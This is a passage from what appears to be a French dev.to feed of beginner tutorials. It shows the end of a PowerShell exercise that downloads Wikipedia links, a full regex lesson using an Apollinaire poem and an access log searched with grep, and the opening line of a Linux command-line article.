class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/\S+'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Matches</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(...) Groups : {0} Success : True Name : 0 Captures : {0} Index : 38 Length : 41 Value : href="/wiki/Wikipedia:General_disclaimer" </code></pre> </div> <p>Voilà quelque chose d'intéressant ! Ce que nous voyons, ce sont les objets résultat de la recherche. Donc en réitérant dessus, nous pourrons récupérer simplement la valeur de ces recherches avec les champs <code>.Value</code> pour l'objet <code>.Match</code> qui appartient à <code>.Matches</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/\S+'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Matches</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Value</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Résulat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(...) href="/wiki/Main_Page" href="/wiki/Main_Page" href="/wiki/Help:Contents" href="/wiki/Special:WhatLinksHere/Hedy_Lamarr" href="/wiki/Wikipedia:About" href="/wiki/Wikipedia:General_disclaimer" </code></pre> </div> <p>Il faut encore trier les résultats :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/\S+'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Matches</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Value</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nt">-Unique</span><span class="w"> </span></code></pre> </div> <p>Maintenant rajouter les liens pour les télécharger :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Select-String</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="o">..</span><span class="nx">/page.html</span><span class="w"> </span><span class="nt">-Pattern</span><span class="w"> </span><span class="s1">'href=\"/wiki/\S+'</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Matches</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">Value</span><span class="p">}</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Sort-Object</span><span class="w"> </span><span class="nt">-Unique</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="bp">$_</span><span class="o">.</span><span class="nf">replace</span><span class="p">(</span><span class="s1">'href="/wiki/'</span><span class="p">,</span><span class="w"> </span><span class="s2">"https://fr.wikipedia.org/wiki/"</span><span class="p">)}</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="n">liens.txt</span><span class="w"> </span></code></pre> </div> <p>Avant de tout télécharger, vérifions quel est le format de nos liens :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">Get-Content</span><span class="w"> </span><span class="nt">-Head</span><span class="w"> </span><span class="nx">5</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">liens.txt</span><span class="w"> </span></code></pre> </div> <p>Résultat :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">/home/chris/Documents/blog/dirdir</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-Content</span><span class="w"> </span><span class="nt">-Head</span><span class="w"> </span><span class="nx">5</span><span class="w"> </span><span class="nt">-Path</span><span class="w"> </span><span class="nx">liens.txt</span><span class="w"> </span><span class="n">https://fr.wikipedia.org/wiki//Film</span><span class="s2">" https://fr.wikipedia.org/wiki/%C3%91uSat"</span><span class="w"> </span><span class="n">https://fr.wikipedia.org/wiki/A_Lady_Without_Passport</span><span class="s2">" https://fr.wikipedia.org/wiki/Alexis_Granowsky"</span><span class="w"> </span><span class="n">https://fr.wikipedia.org/wiki/Alfred_Abel</span><span class="s2">" </span></code></pre> </div> <p>Nous risquons d'avoir un soucis ici, car le <code>"</code> à la fin des lignes risque de casser le lien. Donc, nettoyons cela rapidement :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ForEach ($ligne in Get-Content liens.txt) {$ligne.replace('"', '') &gt;&gt; liens_propres.txt} </code></pre> </div> <p>Et téléchargeons le tout !</p> <p><code>Invoke-WebRequest</code> retourne un objet avec les <a href="https://docs.microsoft.com/en-us/dotnet/api/microsoft.powershell.commands.basichtmlwebresponseobject?view=powershellsdk-7.0.0">champs suivants</a>. Les champs les plus intéressants sont :</p> <ul> <li>Content (le contenu de la page)</li> <li>Links (voir la dernière partie de cet article) </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="kr">ForEach</span><span class="w"> </span><span class="p">(</span><span class="nv">$ligne</span><span class="w"> </span><span class="kr">in</span><span class="w"> </span><span class="n">Get-Content</span><span class="w"> </span><span class="nx">liens_propres.txt</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="n">Invoke-WebRequest</span><span class="w"> </span><span class="nt">-Uri</span><span class="w"> </span><span class="nv">$ligne</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nv">$ligne</span><span class="o">.</span><span class="nf">replace</span><span class="p">(</span><span class="s2">"https://"</span><span class="p">,</span><span class="w"> </span><span class="s2">""</span><span class="p">)</span><span class="o">.</span><span class="nf">replace</span><span class="p">(</span><span class="s2">"/"</span><span class="p">,</span><span class="w"> </span><span class="s2">"_"</span><span class="p">)</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Ici, nous nettoyons les liens des <code>/</code> qui peuvent casser le chemin du fichier (particulièrement sous Linux), c'est pour cela que l'on enchaîne deux méthodes <code>replace</code> lorsque l'on crée le fichier.</p> <h2> Go go powershell </h2> <p>Powershell a encore quelques astuces :</p> <ul> <li> <code>ForEach-Object</code> peut être remplacé par le caractère <code>%</code> et donc les boucles ressemblent à <code>% { bloc }</code> </li> <li> <code>GetChild-Item</code> peut être remplacé par <code>gci</code> </li> <li> <code>Set-Location</code> peut être remplacé par <code>cd</code> </li> <li> <code>Invoke-WebRequest</code> peut télécharger les liens d'une page web <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.1#example-3--get-links-from-a-web-page">d'un coup</a> : <code>(Invoke-WebRequest -Uri "https://aka.ms/pscore6-docs").Links.Href</code>.</li> </ul> <p>Essayez de refaire l'exercice avec ces astuces.</p> <p>Quelques liens pour aller plus loin :</p> <ul> <li><a href="https://github.com/janikvonrotz/awesome-powershell">Awesome Powershell</a></li> <li><a href="https://github.com/PowerShell/PowerShell">Github Officiel de Powershell</a></li> </ul> beginners french powershell chris Wed, 20 Jan 2021 22:39:48 +0000 https://dev.to/evilcel3ri/les-regex-attrapez-les-tous-5alg https://dev.to/evilcel3ri/les-regex-attrapez-les-tous-5alg <p>Est-ce un Pokémon ? Non, mais le thème de cet article vous permettra de tout attraper.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--BbYktk7z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/of389nf6qit899x32e49.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--BbYktk7z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/of389nf6qit899x32e49.png" alt="Qui est ce pokémon ?"></a></p> <p>Vues rapidement dans un article précédent, les expressions régulières sont un langage de programmation qui va vous permettre de filtrer du texte de façon très précise.</p> <p>Pour suivre les exercices de cet article, je vous invite à ouvrir une nouvelle fenêtre ou onglet avec <a href="https://regex101.com/">https://regex101.com/</a> afin de tester en temps réel les commandes.</p> <blockquote> <p>Regex101.com est un site qui vous permet de tester vos expressions régulières sur un texte de votre choix.</p> <p>Pour être sûr que tout fonctionne, assurez vous que vous avez les options "global" et "multiligne" activées en cliquant sur le bout droit de la première fenêtre :</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--eDt0uxVl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/i6jlyd91po34whvn2ku4.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--eDt0uxVl--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/i6jlyd91po34whvn2ku4.png" alt="Regex101 options configuration 1"></a></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QNu7o0_O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/an37z8uv0k5hve38zzon.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QNu7o0_O--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/an37z8uv0k5hve38zzon.png" alt="Regex101 options configuration 2"></a></p> </blockquote> <h1> Bases </h1> <p>Allons directement au vif du sujet. Dans cette première partie, nous allons travailler sur ce <a href="https://fr.wikisource.org/wiki/Nuit_rh%C3%A9nane">texte</a> de Guillaume Apollinaire (que vous pouvez copier dans la seconde fenêtre sur Regex101) :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>NUIT RHÉNANE (1913) Mon verre est plein d’un vin trembleur comme une flamme Écoutez la chanson lente d’un batelier Qui raconte avoir vu sous la lune sept femmes Tordre leurs cheveux verts et longs jusqu’à leurs pieds Debout chantez plus haut en dansant une ronde Que je n’entende plus le chant du batelier Et mettez près de moi toutes les filles blondes Au regard immobile aux nattes repliées Le Rhin le Rhin est ivre où les vignes se mirent Tout l’or des nuits tombe en tremblant s’y refléter La voix chante toujours à en râle-mourir Ces fées aux cheveux verts qui incantent l’été Mon verre s’est brisé comme un éclat de rire </code></pre> </div> <h1> Une question de caractères </h1> <p>Les regex comprennent le texte comme un ensemble de caractères. On peut regrouper ces caractères grossièrement en trois groupes :</p> <ul> <li>les caractères alphabétiques (représentés par <code>a-zA-Z</code> ou <code>\w</code>)</li> <li>les caractères numériques (représentés par <code>0-9</code> ou <code>\d</code>)</li> <li>les caractères spéciaux (<code>!@#$%^&amp;*():""</code> etc.)</li> </ul> <blockquote> <p>dans la première fenêtre écrivez mais n'appuyez pas sur Entrée : <code>\w</code></p> </blockquote> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--uVZ4sEme--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/pjnbi3v06er7holk7px7.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--uVZ4sEme--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/pjnbi3v06er7holk7px7.png" alt="Résultat 1"></a></p> <p>Vous remarquez que tous les caractères alphabétiques sont surlignés en bleu. Donc, ils sont couverts par la recherche <code>\w</code>. Ce n'est pas le cas de certains caractères spéciaux comme "à" ou "ù". Donc, nous <em>filtrons</em> ici toutes les lettres sans accents.</p> <p>Si l'on effectue la recherche <code>a-zA-Z</code>, on trouvera le même résultat.</p> <blockquote> <p>effacez <code>\w</code> et écrivez maintenant : <code>\d</code></p> </blockquote> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--SU6MFrli--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/t3wt9tsckx8biquum11h.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SU6MFrli--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/t3wt9tsckx8biquum11h.png" alt="Résultat 2"></a></p> <p>Ici tous les chiffres sont couverts.</p> <p>Il est aussi possible de choisir tous les caractères <em>sauf</em> les caractères alphabétiques avec <code>\W</code> et pareil pour tous les caractères sauf numériques : <code>\D</code></p> <p>Attention : utiliser une recherche par négation donne des résultats différents. C'est-à-dire que <code>\d</code> n'est pas équivalent à <code>\W</code>. <code>\W</code> donnera comme résultat aussi des caractères comme les espaces, les caractères spéciaux et les retours à la ligne.</p> <p>Un peu comme un.e typographe qui prépare une page, vous devez penser le texte comme un ensemble de caractères qui dessinent le texte ; cela comprend les espaces et les retours à la ligne.</p> <blockquote> <p>Essayez des recherches avec <code>(a-zA-Z)</code> (tout caractères entre "a" et "z" minuscule ou majuscule) et modifiez les intervalles (exemple : <code>(a-cA-O)</code>). Quel est le résultat ? Que donne la recherche : <code>(1-3)</code> ?</p> </blockquote> <p><strong>Note</strong> : les caractères <code>()</code> définissent un groupe de recherche</p> <p>Après les caractères alphanumériques <code>(a-zA-Z0-9)</code>, nous pouvons aussi rechercher des caractères plus spécifiques comme les espaces (insécables et sécables) <code>\s</code>, les retours à la ligne <code>\n</code>, les retours chariots <code>\r</code>. #salutLesTypographes</p> <h1> Une question de position </h1> <p>Que ce passe-t-il lorsque vous recherchez un mot particulier, par exemple, tous les mots qui commencent par "C".</p> <p>Pour cela, les regex utilisent des caractères de position: <code>^</code> pour définir le début d'une ligne <code>$</code> pour définir la fin d'une ligne.</p> <p>Donc pour toutes les lignes commencent par un caractère alphabétique : <code>^\w</code></p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1F_uL0s0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/sc1b6ru9may4sv1py0or.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1F_uL0s0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/sc1b6ru9may4sv1py0or.png" alt="Résultat 3"></a></p> <p>Et toutes les lignes qui commencent par "C" : <code>^C</code> (majuscule vus que dans ce texte toutes les lignes commencent par une majuscule).</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--CDPosFdz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/m5ppicc0mccu1dvw2hb1.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--CDPosFdz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/m5ppicc0mccu1dvw2hb1.png" alt="Résultat 4"></a></p> <p>Pour rechercher tous les débuts de chaîne de caractères (en gros un groupe de lettres et de chiffres séparées par un espace), il faudra utiliser l'ancre : <code>\b</code>. Exemple : tous les mots commençants par "c" - <code>\b[c]</code>.</p> <blockquote> <p>Les parenthèses carrées <code>[]</code> trouveront une occurrences dans la liste présente à l'intérieur. Donc <code>[c]</code> trouvera la lettre "c". La recherche <code>[ces]</code> recherchera les occurrences de "c", "e" ou "s". Dans le cas où vous désirez faire une recherche pour un groupe, il faudra utiliser les parenthèses simples : <code>(ces)</code>. Cette dernière recherche filtrera toutes les occurrences du groupe de lettres "ces".</p> </blockquote> <p><code>\b</code> est un peu malicieux car il recherchera des espaces <strong>avant</strong> un caractère alphabétique mais pas après sauf si vous le précisez en le plaçant à la fin. L'inverse de <code>\b</code> est <code>\B</code> ; tout caractère alphabétique non précédé par un espace donc "à l'intérieur d'un mot mais pas au début".</p> <blockquote> <p>Essayez la recherche suivante : <code>\b(err)</code> et ensuite <code>(er)\b</code>.</p> </blockquote> <p>Pour recherchez la lettre "r" qui ne se trouve pas au début d'un mot, ni à la fin d'un mot : <code>\B[r]\B</code> ou bien <code>\B[r]\S</code>. Ici <code>\S</code> représentes tous les caractères qui ne sont pas des espaces.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--fJY10VuI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ttlw997bstzu1ihpbrgg.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fJY10VuI--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/ttlw997bstzu1ihpbrgg.png" alt="Résultat 5"></a></p> <h1> Recherche modulaire </h1> <p>C'est déjà beaucoup, mais maintenant, il est possible de rajouter un couche de précision dans nos recherches grâce à des "modules".</p> <p>Nous avons déjà vu <code>^</code> et <code>$</code> qui définissent le début et la fin d'une ligne. Donc, par exemple : <code>[a-z]\.[a-z]$</code> trouvera toutes les lignes avec une lettre, suivie d'un point (".") et un caractère alphabétique.</p> <blockquote> <p>Pourquoi des <code>\</code> devant les caractères spéciaux ? Chaque caractère a une signification et une fonction particulière. Nous voulons considérer ces caractères de façon littérale, donc nous devons <em>les échapper</em> avec le caractère <code>\</code>. C'est-à-dire, préciser à l'ordinateur qu'il ne faut pas les considérer comme des fonctions mais comme de simples caractères. C'est le cas pour les <code>/</code>, <code>.</code>, <code>^</code> ou <code>$</code> si vous recherchez ces caractères dans un fichier.</p> <p>Que fait "." lorsqu'il n'est pas échappé ? Les regex le remplacent par n'importe quel caractère. Donc par exemple, <code>[c].[s]</code> donnera des résultats pour un mot commençant par "c", finissant par "s" mais ayant n'importe quel caractère, lettre, chiffre ou caractère spécial en seconde position.</p> </blockquote> <p>Mais <strong>attention</strong>, car lorsqu'il est à l'intérieur de parenthèses carrées, <code>^</code> défini une négation. Donc <code>^a-z</code> et <code>[^a-z]</code> ne donneront pas le même résultat ! La première version prendra toutes les lignes qui commencent par une lettre et le suivant toutes les occurrences qui n'ont pas de lettres.</p> <p><code>+</code> et <code>*</code> associé aux ancres comme <code>\d</code> ou <code>\w</code> vont rechercher respectivement une ou un nombre illimité d'occurrences ou, dans le cas de <code>*</code>, zéro ou un nombre illimité d'occurrences.</p> <p>Vous pouvez aussi préciser le nombre d’occurrences avec les moustaches <code>{}</code>. Par exemple, <code>\w{1, 4}</code> cherchera entre une lettre suivie de jusque trois autres lettres.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--mZHNYW14--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/txqs8f6wdjs4txvg206y.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--mZHNYW14--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/txqs8f6wdjs4txvg206y.gif" alt="Et là il faut une citation latine"></a></p> <h1> Cas pratique </h1> <p>Ici, vous devez être un peu perdu.e.s, donc essayons de prendre des exemples pratiques.</p> <blockquote> <p>Si vous n'avez pas lu les articles précédents, je vous invite à le faire dans le cas où certaines parties des exemples ne sont pas claires. <a href="https://dev.to/christalib/la-ligne-de-commande-linux-pour-les-impatient-e-s-49ne">Premier article</a> et <a href="https://dev.to/christalib/la-ligne-de-commande-linux-pour-les-impatient-e-s-2-cas-pratique-3bph">second article</a></p> </blockquote> <p>Regex101 est fun, mais mettons nous dans une situation réaliste.</p> <p>Téléchargeons ce fichier de logs :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>wget https://gist.githubusercontent.com/christalib/0dd247443fb8251af3ff24c5eb511073/raw/ca9a0b1f8ce90529cc299dea87002f1eb21234a8/gistfile1.txt <span class="nt">-O</span> access_log.txt </code></pre> </div> <p>Le fichier est assez imposant :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>access_log.txt | <span class="nb">wc</span> <span class="nt">-l</span> <span class="c"># 1173</span> </code></pre> </div> <blockquote> <p>Il est possible de faire toutes les opérations que nous avons vues précédemment avec <code>cut</code>, <code>cat</code>, <code>|</code> etc.</p> </blockquote> <h3> Des chiffres... </h3> <p>Commençons par faire des opérations avec les chiffres.</p> <p>Nous voulons : tous les groupes de plus de trois chiffres.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="nt">--color</span> <span class="nt">-E</span> <span class="s2">"[0-9]{3,}"</span> access_log.txt </code></pre> </div> <blockquote> <p>L'option <code>-E</code> utilisera les regex étendues (voir fin de l'article pour plus de détails). L'option <code>--color</code> coloriera le résultat de notre recherche.</p> </blockquote> <p>Si tout va bien, votre résultat ressemblera plus au moins à ceci :</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--rH6S0_Jg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/h78ij64zc9k5a1q1fwc3.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--rH6S0_Jg--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/h78ij64zc9k5a1q1fwc3.png" alt="Résultat 6"></a></p> <p>Vous remarquerez que la première partie de la ligne est une adresse IPv4. Il est possible de les filtrer avec : <code>cat access_log.txt | cut -d " " -f 1</code>. Mais comme nous faisons des regex, faisons-le à la main !</p> <p>Une adrets IPv4 existe sous cette forme : chiffre entre 0 et 9 répété de 1 à 3 fois, suivi d'un point, 3 fois puis chiffre de 0 à 9.</p> <p>Donc ici, nous avons un chiffre de 0 à 9 répété de une à trois fois :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0. 1. 2. ... 123. ... 567. ... 999. </code></pre> </div> <p>En regex : <code>[0-9]{1,3}\.</code></p> <ul> <li> <code>{3}</code> le groupe est répété trois fois </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0.0.0. ... 123.123.123. ... 999.999.999. </code></pre> </div> <p>En regex : <code>([0-9]{1,3}\.){3}\.</code></p> <p>Finalement le groupe est terminé par un chiffre de 0 à 9, répété de une à trois fois mais pas suivi d'un point.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0.0.0.0 ... 123.123.123.123 ... 999.999.999.999 </code></pre> </div> <p>En regex : <code>([0-9]{1,3}\.){3}[0-9]{1,3}</code></p> <p>Et la commande complète :<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>grep -E "^([0-9]{1,3}\.){3}[0-9]{1,3}" access_log.txt </code></pre> </div> <ul> <li> <code>^</code> donne l'indication que l'occurrence est au début de la ligne.</li> <li> <code>()</code> définissent un premier groupe d'occurrences qui sera traité ensemble.</li> <li> <code>[]</code> définissent un groupe dans lequel il y aura au moins un résultat</li> <li> <code>0-9</code> définit un nombre</li> <li> <code>{1,3}</code> définit une occurrence qui sera répétée entre 1 et 3 fois</li> <li> <code>\.</code> échappe le "." pour être considère comme un simple caractère</li> </ul> <p>Et voilà le travail !</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NNtCV7hT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/0m1s92m2lgwpc8oochr8.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NNtCV7hT--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/0m1s92m2lgwpc8oochr8.png" alt="Résultat 7"></a></p> <p>Que faire pour arriver au même résultat qu'avec <code>cut</code> ? C'est-à-dire sans avoir la ligne entière ? Rien de plus simple, ajoutons l'option <code>-o</code> pour dire à <code>grep</code> qu'il ne faut montrer que les occurrences et non toute la ligne.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="nt">-oE</span> <span class="s2">"^([0-9]{1,3}</span><span class="se">\.</span><span class="s2">){3}[0-9]{1,3}"</span> access_log.txt | <span class="nb">sort</span> <span class="nt">-u</span> </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--6BhV8LWN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/zlreq1zsndqxj97xvbrh.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--6BhV8LWN--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/zlreq1zsndqxj97xvbrh.png" alt="Résultat 8"></a></p> <h3> ... et des lettres </h3> <p>Regardez le dessin suivant :</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8Efa6LQY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/swgpvuppdb1vumkqkbro.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8Efa6LQY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/swgpvuppdb1vumkqkbro.png" alt="Regex 666"></a></p> <blockquote> <p>Il y a une erreur dans le regex, utilisez celui-là : <code>(([a-zA-Z\-0-9]+\\.)[a-zA-Z]{2,})$</code></p> </blockquote> <p>Essayez de deviner que trouvera ce regex avant de le lancer, ou bien, lancez le simplement ! #yolo</p> <h1> Conclusion et remarques </h1> <p>Bon, c'était un peu prise de tête quand même.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--27OS0ugK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6pm1fte2jht6xpfg2zc2.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--27OS0ugK--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/6pm1fte2jht6xpfg2zc2.gif" alt="J'ai rien compris"></a></p> <p>Les regex sont un outil très puissant et vraiment utile lorsque vous faites de la recherche dans des centaines voire des milliers de fichiers. Nous avons vu <code>grep</code> mais sachez qu'il existe <code>zgrep</code> qui permet de chercher dans des fichiers compressés comme les .zip.</p> <p>Il y a aussi une version plus puissante de <code>grep</code>, <a href="https://github.com/BurntSushi/ripgrep"><code>ripgrep</code></a> qui décoiffe !</p> <p>Les regex sont aussi un outil très compliqué, leurs possibilités sont très étendues et nous n'avons vu que la surface.</p> <p>Leur implémentations peuvent varier aussi selon les langages. Si vous codez en Python, il est possible que certaines options ne soient pas disponibles. Par exemple, ce <a href="https://www.regular-expressions.info/refmodifiers.html">site</a> permet de comparer certaines options des regex dans différents langages. Car les standards de regex <a href="https://stackoverflow.com/questions/12739633/regex-standards-across-languages">varient en fonction des langages</a>. Pourquoi faire simple...</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cZr6ga4A--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/k1jcfgjhynqdb169yztq.gif" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cZr6ga4A--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_66%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/k1jcfgjhynqdb169yztq.gif" alt="On joue avec les règles à l'aquitaine?"></a></p> <p>Pour finir, j'espère que vous avez pu suivre cet article, et que les regex ont un peu plus de sens pour vous. Vous pouvez vous entraînez aux regex sur ce site web quand vous vous ennuyez : <a href="https://regexcrossword.com/challenges">https://regexcrossword.com/challenges</a>.</p> <p><em>Merci à Dattaz et E. pour les relectures !</em></p> beginners tutorial regex french chris Thu, 14 Jan 2021 15:27:00 +0000 https://dev.to/evilcel3ri/la-ligne-de-commande-linux-pour-les-impatient-e-s-2-cas-pratique-3bph https://dev.to/evilcel3ri/la-ligne-de-commande-linux-pour-les-impatient-e-s-2-cas-pratique-3bph <p><em>Avant de commencer</em> : Il est possible que lorsqu'on lance une commande, on se trompe, souvent même d'ailleurs et moi le premier. 